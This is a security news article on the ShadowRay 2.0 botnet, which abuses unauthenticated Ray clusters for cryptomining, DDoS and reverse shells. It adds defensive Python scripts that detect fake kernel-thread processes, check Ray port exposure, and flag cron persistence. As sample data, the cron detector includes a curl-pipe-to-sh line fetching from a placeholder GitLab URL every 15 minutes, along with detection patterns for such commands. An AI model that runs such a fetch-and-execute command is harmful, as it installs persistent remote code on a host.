Cybersecurity researchers have warned about the rise of ShadowRay 2.0, a botnet campaign that builds on the original ShadowRay attacks, which ran from September 2023 to March 2024. The new campaign exploits the same flaw as before, CVE-2023-48022, a missing-authentication vulnerability in Ray's job submission API with a CVSS score of 9.8: anyone who can reach an exposed Ray cluster can submit arbitrary jobs to it and so take it over. The botnet uses this access to hijack computing power for unauthorized cryptocurrency mining, specifically Monero via XMRig.
ShadowRay 2.0 also checks whether the victim is located in the PRC and, if so, serves a localized variant of the malware for that region. Anyscale, Ray's maintainer, takes the position that Ray is designed to run only in trusted, closed network environments, with authentication left to the surrounding infrastructure rather than the framework itself. As a result, no patch exists for this vulnerability; the only fix is to keep Ray off untrusted networks.
The Infection Chain and Its Implications
The infection chain created by ShadowRay 2.0 turns infected Ray clusters into launch points for "spray and pray" attacks: once inside, the malware uses a compromised cluster to push its payloads to other exposed Ray dashboards, producing a self-replicating worm effect. These hijacked clusters are used for more than cryptojacking. Attackers can weaponize them to launch distributed denial-of-service (DDoS) attacks against rival mining pools or other infrastructure.
With over 230,500 Ray servers reachable from the internet, the potential for damage is vast. ShadowRay 2.0 uses several techniques to evade detection, such as naming its malicious processes after Linux kernel worker threads so that they blend in with legitimate system activity. By capping CPU usage at between 50% and 70%, the botnet avoids the sustained full utilization that would normally draw attention to a miner while still carrying out its work.
“This transforms the operation from pure cryptojacking into a multi-purpose botnet. The ability to launch DDoS attacks adds another monetization vector – attackers can rent out DDoS capacity or use it to eliminate competition.” – Oligo
Technical Capabilities and Persistence Mechanisms
ShadowRay 2.0 abuses the orchestration capabilities of the Ray platform itself to pivot quickly from the internet-facing head node to worker nodes that are not exposed. Once inside, the malware can spread silently through the cluster's internal network. It also drops reverse shells that connect back to the attacker's infrastructure, giving the operators interactive remote control of the compromised hosts.
ShadowRay 2.0 maintains persistence by installing a cron job that, every 15 minutes, pulls the latest version of the malware from GitLab. The attackers use GitLab and GitHub as hosting for staging and delivering their payloads. This self-updating approach compounds detection and mitigation efforts that are already inherently difficult: killing the running payload is not enough if the cron job survives, and the payload itself can change between fetches.
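As an added example (not from the original report and not Oligo's or Anyscale's tooling), the following Python script implements host-side checks for the two behaviours described above: user-space processes disguised as Linux kernel worker threads, and a cron entry that re-fetches a payload from GitLab or GitHub on a short cycle and pipes it into a shell. The process list and crontab it runs on are constructed sample data; the `/tmp/.x/kworker` path and the gitlab.com URL are placeholders, not indicators from the campaign. The `load_procs_from_proc` helper reads live data on a Linux host and is assumed to be run as root to see every process.

```python
"""Host-side checks for two ShadowRay 2.0 behaviours: processes that mimic
kernel worker threads, and a short-cycle cron job that fetches and runs a
remote script. Added example with constructed sample data."""
import os
import re
from dataclasses import dataclass

KTHREADD_PID = 2  # on Linux, genuine kernel threads are children of kthreadd (PID 2)


@dataclass
class Proc:
    pid: int
    ppid: int
    comm: str      # process name as in /proc/<pid>/comm
    cmdline: str   # /proc/<pid>/cmdline with NUL separators replaced by spaces


def fake_kernel_workers(procs):
    """Return processes that look like kernel threads by name but are not.
    A real kernel thread has PPID 2 and an empty cmdline; a user-space binary
    renamed to look like one has a cmdline and an ordinary parent."""
    hits = []
    for p in procs:
        if p.pid == KTHREADD_PID:
            continue
        looks_kernel = re.match(r"^\[?(kworker|ksoftirqd|kswapd|migration)", p.comm)
        if looks_kernel and (p.ppid != KTHREADD_PID or p.cmdline.strip()):
            hits.append(p)
    return hits


def suspicious_cron_lines(crontab_text, max_minutes=15):
    """Flag cron entries that run at least every `max_minutes` minutes and
    pipe curl/wget output into a shell. Returns (line, uses_code_host) pairs,
    where uses_code_host is True when the URL points at gitlab.com or
    github.com. Heuristic: tune the patterns for your environment."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue
        minute, cmd = fields[0], fields[5]
        m = re.match(r"^\*/(\d+)$", minute)
        short_cycle = m is not None and int(m.group(1)) <= max_minutes
        fetch_exec = re.search(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", cmd) is not None
        code_host = re.search(r"https?://[^\s]*(gitlab|github)\.com", cmd) is not None
        if short_cycle and fetch_exec:
            hits.append((line, code_host))
    return hits


def load_procs_from_proc():
    """Read live process data from /proc on a Linux host (not used by the sample run)."""
    procs = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/comm") as f:
                comm = f.read().strip()
            with open(f"/proc/{entry}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
            with open(f"/proc/{entry}/stat") as f:
                # /proc/<pid>/stat: "pid (comm) state ppid ..."; split after the
                # closing parenthesis because comm itself may contain spaces
                ppid = int(f.read().rpartition(")")[2].split()[1])
        except (OSError, ValueError, IndexError):
            continue
        procs.append(Proc(int(entry), ppid, comm, cmdline))
    return procs


# Constructed sample data (not from a real incident).
SAMPLE_PROCS = [
    Proc(2, 0, "kthreadd", ""),
    Proc(15, 2, "kworker/0:1", ""),                                 # genuine kernel thread
    Proc(980, 1, "python3", "python3 /opt/app/train.py"),           # ordinary workload
    Proc(4312, 1, "kworker/u8:3", "/tmp/.x/kworker --threads=4"),   # renamed user-space miner
]

SAMPLE_CRONTAB = """\
# m h dom mon dow command
*/15 * * * * curl -fsSL https://gitlab.com/example/payload/-/raw/main/update.sh | sh
0 3 * * * /usr/bin/apt-get update
"""

if __name__ == "__main__":
    for p in fake_kernel_workers(SAMPLE_PROCS):
        print(f"kernel-thread lookalike: pid={p.pid} ppid={p.ppid} comm={p.comm} cmdline={p.cmdline!r}")
    for line, code_host in suspicious_cron_lines(SAMPLE_CRONTAB):
        print(f"short-cycle fetch-and-execute cron entry (code host: {code_host}): {line}")
```

On a live host, pass `load_procs_from_proc()` to `fake_kernel_workers` and feed it the combined output of every user's crontab plus `/etc/cron.d`; a renamed miner may also throttle itself, so a process that matches here but shows modest CPU usage should not be dismissed on that basis.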
“Attackers deployed sockstress, a TCP state exhaustion tool, targeting production websites.” – Oligo
Mitigation Efforts and Recommendations
Anyscale has released the Ray Open Ports Checker to help with this. The tool validates a cluster's configuration and confirms that Ray's ports have not been accidentally exposed, so that organizations can catch a misconfiguration before an adversary finds it.
The ShadowRay 2.0 botnet is still evolving. Because the underlying vulnerability is unpatched by design, the usual advice to apply updates promptly does not help here; what does help is basic network hygiene: keep Ray's dashboard and job-submission ports off the public internet, place them behind a firewall or an authenticating proxy, and bind the dashboard to localhost unless external access is genuinely required. Organizations should double check their configurations and make sure their systems are not accidentally left open to these kinds of attacks.
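As an added example (not the Ray Open Ports Checker and not code from Anyscale or Oligo), the following Python script performs the local half of that configuration check: it parses the output of `ss -H -ltn` on a Ray head node and reports which of Ray's documented default ports (8265 dashboard, 6379 GCS, 10001 Ray Client) are bound to a non-loopback address. The `ss` output embedded below is constructed sample data. It only inspects the local host; whether those ports are actually reachable from the internet still depends on the firewall and cloud security groups in front of it.

```python
"""Report Ray listener ports bound beyond loopback, from `ss -H -ltn` output.
Added example; the sample output below is constructed."""
import ipaddress
import subprocess

# Ray's documented default listener ports on a head node.
RAY_PORTS = {
    8265: "dashboard / job submission API",
    6379: "GCS (cluster control plane)",
    10001: "Ray Client server",
}


def _is_loopback(addr: str) -> bool:
    """True for 127.0.0.0/8 and ::1. ss prints IPv6 in brackets and '*' for any."""
    addr = addr.strip("[]")
    if addr in ("*", "0.0.0.0", "::"):
        return False
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False  # interface-scoped or symbolic address: treat as exposed


def parse_ss_listeners(ss_output: str):
    """Yield (address, port) for each LISTEN line of `ss -H -ltn`.
    Columns: State Recv-Q Send-Q Local-Address:Port Peer-Address:Port."""
    for line in ss_output.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] != "LISTEN":
            continue
        addr, _, port = parts[3].rpartition(":")
        try:
            yield addr, int(port)
        except ValueError:
            continue


def exposed_ray_ports(ss_output: str):
    """Return {port: (address, description)} for Ray ports bound beyond loopback."""
    found = {}
    for addr, port in parse_ss_listeners(ss_output):
        if port in RAY_PORTS and not _is_loopback(addr):
            found[port] = (addr, RAY_PORTS[port])
    return found


def check_local_host():
    """Run ss on this machine and return the exposed Ray ports (Linux only)."""
    out = subprocess.run(["ss", "-H", "-ltn"], capture_output=True, text=True, check=True).stdout
    return exposed_ray_ports(out)


# Constructed sample: dashboard correctly on loopback, GCS and Ray Client on all interfaces.
SAMPLE_SS = """\
LISTEN 0 128 127.0.0.1:8265 0.0.0.0:*
LISTEN 0 4096 0.0.0.0:6379 0.0.0.0:*
LISTEN 0 128 [::]:10001 [::]:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
"""

if __name__ == "__main__":
    for port, (addr, desc) in sorted(exposed_ray_ports(SAMPLE_SS).items()):
        print(f"port {port} ({desc}) is bound to {addr}, not loopback")
```

In the sample the dashboard is safe but GCS and Ray Client are not. Those two must be reachable by worker nodes and clients, so the remedy there is a firewall rule limiting them to the cluster's own subnet; the dashboard port, which carries the unauthenticated job API, should stay on 127.0.0.1 (Ray's `--dashboard-host` default) and be reached over an SSH tunnel or an authenticating reverse proxy.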

